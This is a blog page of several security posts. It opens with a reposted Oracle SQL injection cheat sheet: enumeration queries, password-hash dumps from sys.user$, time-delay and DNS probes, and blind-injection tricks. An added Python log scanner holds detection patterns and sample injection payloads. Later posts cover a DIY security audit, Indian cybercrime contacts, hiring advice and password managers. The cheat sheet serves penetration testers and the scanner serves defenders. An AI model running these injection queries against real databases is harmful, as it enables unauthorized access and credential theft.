Monday, November 7, 2016

SQL Injection Cheat Sheet for ORACLE

The blog post below is shamelessly copy-pasted from http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet

:) I do not own any of the writings below. This is just a repost and all credits to pentestmonkey.net

Thanks for sharing.


This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to tabulate the data to make it easier to read and to use the same table for each database backend. This helps to highlight any features which are lacking for each database, enumeration techniques that don't apply, and also areas that I haven't got round to researching yet.
The complete list of SQL Injection Cheat Sheets I'm working on is:
I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here.
Some of the queries in the table below can only be run by an admin. These are marked with "-- priv" at the end of the query.

Version
  SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
  SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
  SELECT version FROM v$instance;

Comments
  SELECT 1 FROM dual -- comment
  -- NB: SELECT statements must have a FROM clause in Oracle, so we have to use the dummy table name 'dual' when we're not actually selecting from a table.

Current User
  SELECT user FROM dual;

List Users
  SELECT username FROM all_users ORDER BY username;
  SELECT name FROM sys.user$; -- priv

List Password Hashes
  SELECT name, password, astatus FROM sys.user$ -- priv, <= 10g. astatus tells you if acct is locked
  SELECT name, spare4 FROM sys.user$ -- priv, 11g

Password Cracker
  checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10.

List Privileges
  SELECT * FROM session_privs; -- current privs
  SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP'; -- priv, list a user's privs
  SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY'; -- priv, find users with a particular priv
  SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;

List DBA Accounts
  SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'; -- priv, list DBAs, DBA roles

Current Database
  SELECT global_name FROM global_name;
  SELECT name FROM v$database;
  SELECT instance_name FROM v$instance;
  SELECT SYS.DATABASE_NAME FROM DUAL;

List Databases
  SELECT DISTINCT owner FROM all_tables; -- list schemas (one per user)
  -- Also query the TNS listener for other databases. See tnscmd (services | status).

List Columns
  SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
  SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' AND owner = 'foo';

List Tables
  SELECT table_name FROM all_tables;
  SELECT owner, table_name FROM all_tables;

Find Tables From Column Name
  SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; -- NB: table names are upper case

Select Nth Row
  SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; -- gets 9th row (rows numbered from 1)

Select Nth Char
  SELECT substr('abcd', 3, 1) FROM dual; -- gets 3rd character, 'c'

Bitwise AND
  SELECT bitand(6,2) FROM dual; -- returns 2
  SELECT bitand(6,1) FROM dual; -- returns 0

ASCII Value -> Char
  SELECT chr(65) FROM dual; -- returns A

Char -> ASCII Value
  SELECT ascii('A') FROM dual; -- returns 65

Casting
  SELECT CAST(1 AS char) FROM dual;
  SELECT CAST('1' AS int) FROM dual;

String Concatenation
  SELECT 'A' || 'B' FROM dual; -- returns AB

If Statement
  BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; -- doesn't play well with SELECT statements

Case Statement
  SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- returns 1
  SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- returns 2

Avoiding Quotes
  SELECT chr(65) || chr(66) FROM dual; -- returns AB

Time Delay
  BEGIN DBMS_LOCK.SLEEP(5); END; -- priv, can't seem to embed this in a SELECT
  SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- if reverse lookups are slow
  SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual; -- if forward lookups are slow
  SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; -- if outbound TCP is filtered / slow
  -- Also see Heavy Queries to create a time delay

Make DNS Requests
  SELECT UTL_INADDR.get_host_address('google.com') FROM dual;
  SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual;

Command Execution
  Java can be used to execute commands if it's installed.
  ExtProc can sometimes be used too, though it normally failed for me. :-(

Local File Access
  UTL_FILE can sometimes be used. Check that the following is non-null:
  SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';
  Java can be used to read and write files if it's installed (it is not available in Oracle Express).

Hostname, IP Address
  SELECT UTL_INADDR.get_host_name FROM dual;
  SELECT host_name FROM v$instance;
  SELECT UTL_INADDR.get_host_address FROM dual; -- gets IP address
  SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- gets hostnames

Location of DB files
  SELECT name FROM V$DATAFILE;

Default/System Databases
  SYSTEM
  SYSAUX

Misc Tips

In no particular order, here are some suggestions from pentestmonkey readers.
From Christian Mehlmauer:
Get all table names in one string
  select rtrim(xmlagg(xmlelement(e, table_name || ',')).extract('//text()').extract('//text()') ,',') from all_tables -- when using union based SQLi with only one row

Blind SQLi in ORDER BY clause
  order by case when ((select 1 from user_tables where substr(lower(table_name), 1, 1) = 'a' and rownum = 1)=1) then column_name1 else column_name2 end -- you must know 2 column names with the same datatype
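As an added example (mine, not part of pentestmonkey's cheat sheet or this blog), here is the defender's side of the table above: a small Python scanner that URL-decodes request targets from web access logs and flags the Oracle-specific fingerprints the cheat sheet relies on (the dual dummy table, v$ and data-dictionary views, the UTL_INADDR/UTL_HTTP/UTL_FILE packages, DBMS_LOCK.SLEEP, and the chr()/|| quote-avoidance trick). The log lines are constructed samples, the signature names are my own labels, and decoding is repeated so a double-encoded payload is inspected too; the "dual citizenship" search shows why the pattern requires FROM before dual instead of matching the bare word.

```python
import re
from urllib.parse import unquote_plus

# Oracle-specific fingerprints taken from the cheat sheet above. The labels are
# this example's own, not an established taxonomy.
SIGNATURES = {
    "dual_dummy_table": re.compile(r"\bfrom\s+dual\b", re.I),
    "oracle_dictionary_view": re.compile(
        r"\bv\$(?:version|instance|database|datafile|parameter2)\b"
        r"|\b(?:all_users|all_tables|all_tab_columns|user_tables|dba_sys_privs"
        r"|dba_role_privs|session_privs|global_name)\b"
        r"|\bsys\.user\$",
        re.I,
    ),
    "network_package": re.compile(r"\butl_(?:inaddr|http|file)\b", re.I),
    "time_delay": re.compile(r"\bdbms_lock\.sleep\b", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    # Weaker signal: substr/ascii/chr/bitand and || are not Oracle-only, but
    # legitimate parameter values very rarely contain them.
    "char_functions": re.compile(r"\b(?:substr|ascii|chr|bitand)\s*\(|\|\|", re.I),
}

# Common Log Format: client ident user [timestamp] "METHOD target PROTOCOL" status bytes
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)

# Constructed sample log lines (not real traffic). Line 2 is a UNION probe for
# the version banner, line 3 a blind substr/ascii probe, line 4 a DBMS_LOCK
# delay, line 5 a harmless search, line 6 a double-encoded probe.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Nov/2016:10:01:02 +0000] "GET /item?id=42 HTTP/1.1" 200 512
10.0.0.6 - - [07/Nov/2016:10:01:05 +0000] "GET /item?id=42%27%20UNION%20SELECT%20banner%20FROM%20v%24version-- HTTP/1.1" 500 231
10.0.0.7 - - [07/Nov/2016:10:01:09 +0000] "GET /item?id=42%20AND%20ascii(substr((SELECT%20user%20FROM%20dual),1,1))%3E64 HTTP/1.1" 200 512
10.0.0.8 - - [07/Nov/2016:10:01:12 +0000] "GET /item?id=42%3BBEGIN%20DBMS_LOCK.SLEEP(5)%3B%20END%3B HTTP/1.1" 200 512
10.0.0.9 - - [07/Nov/2016:10:01:15 +0000] "GET /search?q=dual+citizenship HTTP/1.1" 200 800
10.0.0.10 - - [07/Nov/2016:10:01:18 +0000] "GET /item?id=42%2527%2520UNION%2520SELECT%2520user%2520FROM%2520dual-- HTTP/1.1" 200 512
"""


def decode_target(target: str, rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so double-encoded payloads are inspected as well."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify_request(target: str) -> list:
    """Return the sorted list of signature names matching the decoded request target."""
    decoded = decode_target(target)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))


def scan_log(text: str) -> list:
    """Parse CLF lines and return one finding per request that hits any signature."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; a real pipeline would count these
        hits = classify_request(m.group("target"))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "timestamp": m.group("ts"),
                "target": decode_target(m.group("target")),
                "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']:<10} {', '.join(f['indicators']):<40} {f['target']}")
```

The signatures are deliberately narrow: a bare "dual" or "chr" in user input is common English, so each pattern anchors on the surrounding SQL shape (FROM before dual, an opening parenthesis after the function name). Treat "char_functions" on its own as a low-confidence hit and the dictionary-view, UTL_* and DBMS_LOCK signatures as high-confidence ones.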

Tuesday, March 23, 2010

Cyber Crime!!! Important Emergency Contacts (INDIA)

Are your friends getting spam mails from your e-mail account? I suppose that your email address must have been hacked, or your computer itself must be compromised and the attacker has gathered your email id and password. Keep your email accounts and bank accounts as safe as possible. In any case of misuse of your email address or cybercrime, do feel free to report it. I will give you some information on it which would be useful for you in future. Moreover, be careful using computers in an internet cafe or any PC which you do not know. First do a virus check on your computer. Check if there is any kind of malware sitting on your computer. If yes, then clean it first. Remember, if your computer itself is compromised then the attacker can see and trace every keystroke on your keyboard. That is why you have virtual keyboards on any net banking login page. Remember to use that virtual keyboard from next time on the bank login page. Anyway, if you still face any troubles online then you can always call the cyber crime department in Tamil Nadu (INDIA). I will update the global cyber crime cell numbers shortly.

In case of any major problems you can call the numbers below.

Deputy Commissioner , CyberCrime department - (044) - 23452214
Assistant commissioner , BankFraud department - (044) - 23452384




The below is a list of the major ISPs in India and whom to report to when you face any cybercrimes or malicious activities.

Aksh Broadband
postmaster@akshbroadband.in

Avadh Online (ISP based in Lucknow)
postmaster@avadh.com

BSES - Power Surfer
postmaster@powersurfer.net

BSES TeleCom Limited (ISP in Mumbai)
postmaster@bses.net

CJ Online
postmaster@cjnet4u.com

Estel
postmaster@estelcom.com
support@estelcom.com
techsupport@bharti.com

Gateway Systems India
web site url: http://www.gatewaysys.com/
postmaster@gatewaysys.com
abuse@gatewaysys.com
support@gatewaysys.com

Hathway
postmaster@hathway.com (for hathway.com)
abuse@airtelbroadband.in (for hathway.com)
abuse@hathway.com (for hathway.com)
spam@hathway.net (for hathway.com)
vijaym@hathway.net (for hathway.com)

In2Cable (India) Ltd
postmaster@in2cable.com (for in2cable.com)
abuse@in2cable.com (for in2cable.com)

Mantra Online (AIRTEL)
abuse@bharti.com (for bharti.com)
helpdesk.network@bharti.com (for bharti.com)
incident@cert-in.org.in (for bharti.com)

Mantra Online
web site url: http://www.mantraonline.com/mantra.html
abuse@airtelbroadband.in (for mantraonline.com)
abuse@bharti.com (for mantraonline.com)
helpdesk.network@bharti.com (for mantraonline.com)
incident@cert-in.org.in (for mantraonline.com)

Pacific Internet (Pacnet)
abuse@pacific.net.in (for pacific.net.in)

Primus Telecommunications
abuse@primushost.com

SancharNet - BSNL Internet Dialup Service
abuse@bsnl.in (for sancharnet.in)
dnwplg@sancharnet.in (for sancharnet.in)
incident@cert-in.org.in (for sancharnet.in)

Sify Limited
abuse@satyam.net.in (for sifycorp.com)
customercare@satyam.net.in (for sifycorp.com)

Spectranet
postmaster@spectranet.com (for spectranet.com)
noc@spectranet.com (for spectranet.com)
spectracare@spectranet.com (for spectranet.com)
abuse@spectranet.com (for spectranet.com)

Tata Indicom Broadband
postmaster@tataindicombroadband.in

Tatanova
postmaster@tatanova.com (for tatanova.com)
abuse@tataisp.com (for tatanova.com)
postmaster@tataisp.com (for tatanova.com)
customercare@tatanova.com (for tatanova.com)
feedback.tatanova@tataisp.com (for tatanova.com)
idcmum@tataisp.com (for tatanova.com)

Videsh Sanchar Nigam Limited (VSNL, now Tata Communications)
postmaster@vsnl.in (for vsnl.in)
abuse@vsnl.net (for vsnl.in)
abuse@vsnl.com (for vsnl.in)
customerservice@vsnl.co.in (for vsnl.in)





Hope the information was useful. Share it with people who are unaware of cyber crime. Awareness will stop most of the crime. ;) Cheers

Thursday, May 21, 2009

10 Steps to Create Your Own Security Audit

Every business has valuable IT assets such as computers, networks, and data. And protecting those assets requires that companies big and small conduct their own IT security audits in order to get a clear picture of the security risks they face and how to best deal with those threats.

The following are 10 steps to conducting your own basic IT security audit. While these steps won't be as extensive as audits provided by professional consultants, this DIY version will get you started on the road to protecting your own company.

1. Defining the Scope of Your Audit: Creating Asset Lists and a Security Perimeter

The first step in conducting an audit is to create a master list of the assets your company has, in order to later decide upon what needs to be protected through the audit. While it is easy to list your tangible assets, things like computers, servers, and files, it becomes more difficult to list intangible assets. To ensure consistency in deciding which intangible company assets are included, it is helpful to draw a "security perimeter" for your audit.

What is the Security Perimeter?
The security perimeter is both a conceptual and physical boundary within which your security audit will focus, and outside of which your audit will ignore. You ultimately decide for yourself what your security perimeter is, but a general rule of thumb is that the security perimeter should be the smallest boundary that contains the assets that you own and/or need to control for your own company's security.

Assets to Consider
Once you have drawn up your security perimeter, it is time to complete your asset list. That involves considering every potential company asset and deciding whether or not it fits within the "security perimeter" you have drawn. To get you started, here is a list of common sensitive assets:

  1. Computers and laptops
  2. Routers and networking equipment
  3. Printers
  4. Cameras, digital or analog, with company-sensitive photographs
  5. Data - sales, customer information, employee information
  6. Company smartphones/ PDAs
  7. VoIP phones, IP PBXs (digital version of phone exchange boxes), related servers
  8. VoIP or regular phone call recordings and records
  9. Email
  10. Log of employees' daily schedules and activities
  11. Web pages, especially those that ask for customer details and those that are backed by web scripts that query a database
  12. Web server computer
  13. Security cameras
  14. Employee access cards.
  15. Access points (i.e., any scanners that control room entry)

This is by no means an exhaustive list, and you should at this point spend some time considering what other sensitive assets your company has. The more detail you use in listing your company's assets (e.g., "25 Dell Laptops Model D420 Version 2006", instead of "25 Computers") the better, because this will help you recognize more clearly the specific threats which face each particular company asset.

2. Creating a 'Threats List'

You can't protect assets simply by knowing what they are; you also have to understand how each individual asset is threatened. So in this stage you will compile an overall list of the threats which currently face your assets.

What Threats to Include?
If your threat list is too broad, your security audit will end up focused on threats which are extremely small or remote. When deciding whether to include a particular threat on your 'Threat List', keep in mind that your test should follow a sliding scale. For example, if you are considering the possibility of a hurricane flooding out your servers, you should weigh both how remote the threat is and how devastating the harm would be if it occurred. A moderately remote harm can still reasonably be included in your threat list if the potential harm to your company is large enough.

Common 'Threats' to Get You Started
Here are some relatively common security threats to help you get started in creating your company's threat list:

  1. Computer and network passwords. Is there a log of all people with passwords (and what type)? How secure is this ACL, and how strong are the passwords currently in use?
  2. Physical assets. Can computers or laptops be picked up and removed from the premises by visitors or even employees?
  3. Records of physical assets. Do they exist? Are they backed up?
  4. Data backups. What backups of virtual assets exist, how are they backed up, where are the backups kept, and who conducts the backups?
  5. Logging of data access. Each time someone accesses some data, is this logged, along with who, what, when, where, etc.?
  6. Access to sensitive customer data, e.g., credit card info. Who has access? How can access be controlled? Can this information be accessed from outside the company premises?
  7. Access to client lists. Does the website allow backdoor access into the client database? Can it be hacked?
  8. Long-distance calling. Are long-distance calls restricted, or is it a free-for-all? Should it be restricted?
  9. Emails. Are spam filters in place? Do employees need to be educated on how to spot potential spam and phishing emails? Is there a company policy that outgoing emails to clients not have certain types of hyperlinks in them?

3. Past Due Diligence & Predicting the Future

At this point, you have compiled a list of current threats, but what about security threats that have not come on to your radar yet, or haven't even been developed? A good security audit should account not just for those security threats that face your company today, but those that will arise in the future.

Examining Your Threat History
The first step towards predicting future threats is to examine your company's records and speak with long-time employees about past security threats that the company has faced. Most threats repeat themselves, so by cataloging your company's past experiences and including the relevant threats on your threat list you'll get a more complete picture of your company's vulnerabilities.

Checking Security Trends
In addition to checking for security threats specific to your particular industry, check an IT security threat list, which will keep you abreast of new security threat developments. Spend some time looking through these resources and consider how these trends are likely to affect your business in particular. If you're stumped on what to do here, then ask the IT security experts directly.

Checking with your Competition
When it comes to outside security threats, companies that are ordinarily rivals often turn into one another's greatest asset. By developing a relationship with your competition you can develop a clearer picture of the future threats your company will face by sharing information about security threats with one another.

4. Prioritizing Your Assets & Vulnerabilities

You have now developed a complete list of all the assets and security threats that your company faces. But not every asset or threat has the same priority level. In this step, you will prioritize your assets and vulnerabilities in order to know your company's greatest security risks, and so that you can allocate your company's resources accordingly.

Perform a Risk Calculation/ Probability Calculation
The bigger the risk, the higher priority dealing with the underlying threat is. The formula for calculating risk is:

Risk = Probability x Harm

The risk formula just means that you multiply the likelihood of a security threat actually occurring (probability) times the damage that would occur to your company if the threat actually did occur (harm). The number that comes out of that equation, is the risk that threat poses to your company.

Calculating Probability
Probability is simply the chance that a particular threat will actually occur. Unfortunately, there isn't a book that lists the probability that your website will be hacked this year, so you have to come up with those figures yourself.

Your first step in calculating probability should be to do some research into your company's history with this threat, your competitors' history, and any empirical studies on how often most companies face this threat. Any probability figure that you ultimately come up with is an estimate, but the more accurate the estimate, the better your risk calculation will be.

Calculating Harm
How much damage would a particular threat cause if it occurred? Calculating the potential harm of a threat can be done in a number of different ways. You might count up the cost in dollars that replacing the lost revenue or asset would cost the company. Or instead you might calculate the harm as the number of man-hours which would be lost trying to remedy the damage once it has occurred. But whatever method you use, it is important that you stay consistent throughout the audit in order to get an accurate priorities list.
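To make steps 1 to 4 concrete, here is an added example (not part of the original article) that keeps a small risk register in Python: each entry pairs an asset from your asset list with a threat from your threat list, an estimated probability for the audit period (0 to 1) and a harm figure in one consistent unit, here dollars, and then ranks the entries by Risk = Probability x Harm. The register contents are constructed; the hurricane entry shows how a remote threat with large harm still outranks a likelier but cheaper one, which is the sliding-scale point made under step 2.

```python
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class ThreatEntry:
    """One row of the risk register: an asset, a threat against it, and the two estimates."""
    asset: str
    threat: str
    probability: float  # estimated chance the threat occurs during the audit period, 0.0 to 1.0
    harm: float         # estimated damage if it does occur, in one consistent unit (dollars here)

    def risk(self) -> float:
        # Risk = Probability x Harm, exactly as the article states it
        return self.probability * self.harm


def validate(entry: ThreatEntry) -> ThreatEntry:
    """Reject estimates that cannot be right before they distort the ranking."""
    if not 0.0 <= entry.probability <= 1.0:
        raise ValueError(f"{entry.asset} / {entry.threat}: probability must be between 0 and 1")
    if entry.harm < 0:
        raise ValueError(f"{entry.asset} / {entry.threat}: harm cannot be negative")
    return entry


def prioritize(entries: List[ThreatEntry]) -> List[ThreatEntry]:
    """Highest risk first; ties broken by harm so a rare but devastating threat is not buried."""
    return sorted((validate(e) for e in entries), key=lambda e: (e.risk(), e.harm), reverse=True)


def risk_table(entries: List[ThreatEntry]) -> List[tuple]:
    """(asset, threat, risk) rows in priority order, handy for the audit write-up."""
    return [(e.asset, e.threat, round(e.risk(), 2)) for e in prioritize(entries)]


# Constructed sample register; the figures are illustrative estimates, not data from the article.
SAMPLE_REGISTER = [
    ThreatEntry("25 sales-team laptops", "theft from premises", 0.20, 15_000),
    ThreatEntry("customer database", "SQL injection through the web site", 0.10, 250_000),
    ThreatEntry("server room", "hurricane flooding", 0.01, 400_000),
    ThreatEntry("company email", "phishing leading to credential theft", 0.50, 20_000),
    ThreatEntry("backup tapes", "unreadable when a restore is needed", 0.15, 80_000),
]


if __name__ == "__main__":
    for asset, threat, risk in risk_table(SAMPLE_REGISTER):
        print(f"{risk:>10,.2f}  {asset:<22} {threat}")
```

Keep the harm column in one unit throughout (all dollars, or all staff-hours); mixing units is the quickest way to get a ranking that looks precise and means nothing, which is why validate() exists and why the unit is written in the field comment.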

Developing Your Security Threat Response Plan

When working down your newly developed priority list, there will be a number of potential responses you could make to any particular threat. The remaining six points in this article cover the primary responses a company can make to a particular threat. While these security responses are by no means the only appropriate ways to deal with a security threat, they will cover the vast majority of the threats your company faces, and as a result you should go through this list of potential responses before considering any alternatives.

5. Implementing Network Access Controls

Network Access Controls, or NACs, check the security of any user trying to access a network. So, for example, if you are trying to come up with a solution for the security threat of your competition stealing company information from private parts of the company's website, applying network access controls is an excellent solution.
Part of implementing effective NAC is to have an ACL (Access Control List), which indicates user permissions to various assets and resources. Your NAC might also include steps such as encryption, digital signatures, ACLs, verifying IP addresses and user names, and checking cookies for web pages.

6. Implementing Intrusion Prevention

While a Network Access Control deals with threats of unauthorized people accessing the network by taking steps like password-protecting sensitive data, an Intrusion Prevention System (IPS) prevents more malicious attacks from the likes of hackers.

The most common form of an IPS is a second generation firewall. Unlike first generation firewalls, which were merely content based filters, a second generation firewall adds to the content filter a 'Rate-based filter'.

  • Content-based. The firewall does deep packet inspection, which is a thorough look at actual application content, to determine if there are any risks.
  • Rate-based. Second generation firewalls perform advanced analyses of either web or network traffic patterns or inspection of application content, flagging unusual situations in either case.

7. Implementing Identity & Access Management

Identity and Access Management (IAM) simply means controlling users' access to specific assets. Under an IAM, users have to manually or automatically identify themselves and be authenticated. Once authenticated, they are given access to those assets to which they are authorized.

An IAM is a good solution when trying to keep employees from accessing information they are not authorized to access. So, for instance, if the threat is that employees will steal customers' credit card information, an IAM solution is your best bet.

8. Creating Backups

When we think of IT security threats, the first thing that comes to mind is hacking. But a far more common threat to most companies is the accidental loss of information. Although it's not sexy, the most common way to deal with threats of information loss is to develop a plan for regular backups. These are a few of the most common backup options and questions you should consider when developing your own backup plan:

  • Onsite storage. Onsite storage can come in several forms, including removable hard drives or tape backups stored in a fireproofed, secured-access room. The same data can be stored on hard drives which are networked internally but separated by a DMZ (demilitarized zone) from the outside world.
  • Offsite storage. Mission-critical data could be stored offsite, as an extra backup to onsite versions. Consider worst-case scenarios: If a fire occurred, would your hard-drives or digital tapes be safe? What about in the event of a hurricane or earthquake? Data can be moved offsite manually on removable media, or through a VPN (Virtual Private Network) over the Internet.
  • Secured access to backups. Occasionally, the need to access data backups will arise. Access to such backups, whether to a fireproofed room or vault, or to an offsite data center, physically or through a VPN, must be secure. This could mean issuing keys, RFID-enabled "smart pass cards", VPN passwords, safe combinations, etc.
  • Scheduling backups. Backups should be automated as much as possible, and scheduled to cause minimum disruption to your company. When deciding on the frequency of backups, be aware that if your backups aren't frequent enough to be relevant when called upon, they are not worth conducting at all.

9. Email Protection & Filtering

Each day, 55 billion spam messages are sent by email throughout the world. To limit the security risk that unwanted emails pose, spam filters and an educated workforce are a necessary part of every company's security efforts. So, if the threat you are confronting is spam emails, the obvious (and correct) response is to implement an email security and filtering system for your company.

While the specific email security threats confronting your company will determine the appropriate email protections you choose, here are a few common features:

  • Encrypt emails. When sending sensitive emails to other employees at other locations, or to clients, emails should be encrypted. If you have international clients, make sure that you use encryption allowed outside of the United States and Canada.
  • Try steganography. Steganography is a technique for hiding information discreetly in the open, such as within a digital image. However, unless combined with something like encryption, it is not secure and could be detected.
  • Don't open unexpected attachments. Even if you know the sender, if you are not expecting an email attachment, don't open it, and teach your employees to do the same.
  • Don't open unusual email. No spam filter is perfect. But if your employees are educated about common spam techniques, you can help keep your company assets free of viruses.

10. Preventing Physical Intrusions

Despite the rise of new generation threats like hacking and email spam, old threats still imperil company assets. One of the most common threats is physical intrusions. If, for example, you are trying to deal with the threat of a person breaking into the office and stealing company laptops, and along with them valuable company information, then a plan for dealing with physical intrusions is necessary.

Here are some common physical threats along with appropriate solutions for dealing with them:

  • Breaking into the office: Install a detection system. Companies like ADT have a variety of solutions for intrusion detection and prevention, including video surveillance systems.
  • Stolen laptop: Encrypt the hard drive. Microsoft offers the Encrypting File System, or EFS, which can be used to encrypt sensitive files on a laptop.
  • Stolen screaming smart phones. A new service from Synchronica protects smartphones and PDAs should they be stolen. Once protected, a stolen phone cannot be used without an authorization code. If this is not given correctly, all data is wiped from the phone and a high-pitched "scream" is emitted. Once your phone is recovered, the data can be restored from remote servers. Currently, this particular service is limited to the UK, but comparable services are available throughout the world.
  • Kids + Pets = Destruction: Prevent unauthorized access. For many small-business owners, the opportunity to work from home is an important perk. But having children and/or pets invading office space and assets can often be a greater risk than that posed by hackers. By creating an appropriate-use policy and sticking with it, small business owners can quickly deal with one of their most significant threats.
  • Internal Click Fraud: Education and Blocks. Many web-based businesses run advertising such as Google AdSense or Chitika to add an extra revenue stream. However, inappropriate clicking of the ads by employees or family can cause your account to be suspended. Make employees aware of such things, and prevent the company's live website from being viewed internally.

Conclusion

These 10 steps to conducting your own IT Security Audit will take you a long way towards becoming more aware of the security threats facing your company as well as help you begin to develop a plan for confronting those threats. But it is important to remember that security threats are always changing, and keeping your company safe will require that you continually assess new threats and revisit your response to old ones.

I understand that even these steps would be difficult for most of you reading this. If you think it's not your cup of tea, then I recommend you leave it to the security auditors to do the complete job on your information security. I hope you know where to find the security auditor ;). I would like to thank the IT security website which gave me a lot of ideas and thoughts for this article to share with you all here.

Monday, May 11, 2009

For The IT recruiters and Hiring managers (Must Read)

Open Letter from Geeks to IT Recruiters and Hiring Managers

Preface: No, I'm not looking for a job. I just wanted all the IT recruiters and Hiring Managers to read this. I've seen it before, and my friends (some currently unemployed) are seeing it still.

For the love of all things good in the world, learn how to hire and employ a geek. You're doing it wrong.

Office Politics
Try to measure productivity in output, not in hours.

Geeks automate. Geeks script. Geeks compile. They summon computing power to get things done quickly on their behalf. If your geek seemingly spends all day on Orkut and Facebook but somehow manages to still complete tasks ahead of schedule, your geek is multi-tasking. This is normal.



Assign tasks to the geeks who are most interested in them, not the ones with the most experience.


When geeks are interested, they are passionate. When they're passionate, they learn fast. You'll get more productivity out of an interested geek with no prior experience than you will with a bored drone who's been doing the same thing for the past five years. Sometimes, the one with the most experience is the one that's most interested. In those cases, you are a lucky manager!



Segregate the corporate, compensatory hierarchy from the leadership hierarchy.

With a team of geeks under you, one or more will eventually become the go-to guy (or girl) for certain things. You don't usually need to assign a "team lead" - through meritocracy, the Alpha Geek will emerge. That Alpha Geek may lack seniority, but will have the most influence. It's best to let this occur naturally. It's awkward when the one who best fits the role has to answer to someone else just because they've been around longer. Furthermore, the members of your team will still go to the Alpha Geek even though the wrong person has the "Team Lead" label. As Paul Glen puts it: Geeks don't hate hierarchy. They hate your hierarchy.

You'll know you've found the Alpha Geek when you see people from your team (and likely other teams) at said geek's desk getting advice or validation on a frequent basis.



Pre-hiring and interview

Have all screening and profile "paperwork" in one comprehensive online wizard or form.

Geeks do not like pens, pencils, or clip boards. We also despise giving you the same piece of information more than once on fifteen different sheets of paper. We'd rather not be sitting on an uncomfortable chair in a room that's far too brightly lit just so that we can give you the information that you want. It's easy to get the information to you electronically.


Only ask for information you need to make a hiring decision.

W2's, Direct deposit information, full fingerprints, home address and all that crap can be handled during orientation. The only personally identifiable information you need before hiring is a name.


Don't grill us on our resume and work history.

You don't hire a geek for what he or she did two years ago. You hire them for what they will be able to do for you now and in the future. Ask your geek to describe scenarios where problems arose that required them to pick up a new skill set to solve. All geeks worth their salt have stories like that and love telling them.



Instead of asking about skills that qualify them for the position, ask about their interest in the kind of work they think they'll be doing.

Remember: Interested geeks work harder. The above requirement will still let you H.R. types ask that oh-so-predictable question: "What is it that you think this company does?" while offering your candidate a chance to really show he or she will be a good match.

Friday, May 8, 2009

6 Free Ways to Manage All Your Passwords


It's very difficult to remember all of your passwords. The easy options for remembering them are using the same password each time or writing them down on paper or in a spreadsheet, but those are not so secure. In fact, security experts strongly warn against these options, as they leave you vulnerable to online theft. So I am posting here some of the best password managers that can help you remember all your passwords safely.


Track All Your Passwords


KeePass Password Safe: KeePass is a free, open source, lightweight and easy-to-use password manager for Windows and mobile devices. It will store an unlimited number of passwords and will automatically fill username and password fields, or you can fill them yourself with copy-and-paste or drag-and-drop. And, since it’s open source, there are several unofficial projects that bring KeePass to other platforms like Mac OS X, Linux, and Pocket PC.

Password Manager Plus: The Billeo Free Password Manager Plus toolbar works with both Firefox and Internet Explorer, and allows you to store not only passwords but credit card numbers and online account information, and can autofill your information as you shop online or pay bills, for example.

RoboForm 6.9: RoboForm makes logging into Web sites and filling forms faster, easier, and more secure. RoboForm provides storage for all types of information and complete automation for filling out forms on the web. It gives you several encryption options, enables true “one-click” logins, will generate strong, random passwords for you, can handle complex web forms without being “trained,” and that’s just the tip of the iceberg. If you want it, RoboForm’s probably got it.
RoboForm also has Windows Mobile, Pocket PC, Palm, and Symbian versions, but for those of us without handheld computers RoboForm offers RoboForm2Go, a portable app designed to live entirely on a portable storage device like a pocket USB drive. This lets you bring your whole collection of secure information, plus RoboForm’s automatic form-filling magic, anywhere.

Clipperz: Unlike most password managers, this solution is online, so you can access it anywhere. And it stores more than passwords: credit card numbers, account numbers, anything really. Storing passwords and other confidential information online can make some people nervous, but Clipperz uses an encryption method that means not even Clipperz knows what it's storing. This is a good solution if you need access to your passwords from multiple computers, rather than just one or two.

Password generator: This is a little bookmarklet that combines your master password with the site's name to create a stronger password, and one that is different for each site. Very handy and simple.

Password Hasher: This Firefox extension generates strong passwords for you by scrambling your master password with the site's name. The passwords generated by this extension are better than any you could come up with yourself.

These are a few ways to manage all your passwords, but remember that these are the best ways to hack all your passwords together too. But be safe: don't fall for social engineering, and don't let others use your computer if you are using these kinds of password managers. If the attacker gets into your computer and cracks your password manager, then all your passwords are revealed to him. So be safe in using these kinds of password managers. ;) So you decide for yourself what this post is for: a benefit for you in tracking all your passwords, or a real security threat?? I am confused too ;) You need to store all your passwords somewhere because you cannot remember them all. But at the same time it's a security threat too.. ;) So always remember to at least store the passwords in a jumbled way to keep your accounts safe.

